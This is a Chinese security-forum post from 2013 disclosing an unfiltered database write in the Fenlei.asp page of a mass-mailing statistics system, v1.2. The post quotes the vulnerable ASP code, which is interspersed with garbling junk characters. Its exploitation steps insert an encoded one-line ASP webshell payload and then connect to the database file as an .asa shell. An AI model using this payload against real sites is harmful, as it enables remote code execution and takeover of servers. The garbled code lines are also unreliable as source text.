找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1956|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
'Fenlei.asp ' {8 V; \8 [' T2 D. p6 z

6 M6 E. Z. `. h. y) U* v+ i" FIF Request.QueryString("Action")="del" Then ! x% J. A( v" ]; [& N; _* U5 P
ID=Request.QueryString("ID")
% C, Z$ Y9 @+ ?) k/ QIF Countss ("tui","Fenlei",ID )<>0 then
7 l8 E- }: _; K& |7 i'略 4 }& Y7 F' A/ I: j) F
IF Request.QueryString("Action")="Add" Then
5 B/ h9 v2 a; CTname=Request.Form("Typename") 2 X* z# }2 l3 Y/ I8 F2 c9 i4 e
Set Rs=Server.CreateObject("adodb.Recordset") 5 f1 b% P: c1 e5 _9 c8 Y
Sql="Select * From Fenlei Order by id Desc "
$ n$ h9 _, W9 h" X, v$ ERs.Open Sql,Conn,1,3 6 |$ E0 D: e' W0 T
Rs.Addnew
1 U( Y/ L. U2 W5 W$ N! e; C, a- zRs("Typename")=Tname
/ P* S* e. c" s'略 . {( ~/ a5 ?6 v+ j5 e# h; D& ^
Set Rs=Server.CreateObject("adodb.Recordset") # N, U: p3 `( ~/ I4 s. M
Sql="Select * From Fenlei Order by id Desc " 7 K* K: w, q  |+ D' a  w# w
Rs.Open Sql,Conn,1,1
' E+ D9 |" x7 j/ w5 X: r/ t; {$ r'略
8 V% m' q7 T; ~  b%>
- t# x; M( w- }4 f( {9 y
$ Q* l$ m+ b0 g" Y 4 F) L! B, D8 T# i$ ~( x& @; A

; X+ v7 J# p! k' w4 d- o9 g没有过滤,直接写入数据库。
, c1 C/ \4 t/ A
$ i5 }) |9 e7 n# i! P8 ~. e  I利用方法:
5 Z" r) x$ ]6 ~2 Y+ \ 8 M8 {  G& d5 A
插入:┼攠數畣整爠煥敵瑳∨≡┩>
8 _5 l6 @# M. G' V! F2 ~. P / `& f' q: @$ \8 e& l1 P" F
: k+ I" {+ i0 L0 R! [
连接: http://www.xxx.com/###tongbaner.asa
. m9 b7 y; E; @. w- |4 t. T2 Z'默认安装文件: , E7 q, W* _$ ~1 a2 F
'install.asp) v4 }7 m0 t9 d5 _) f# Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表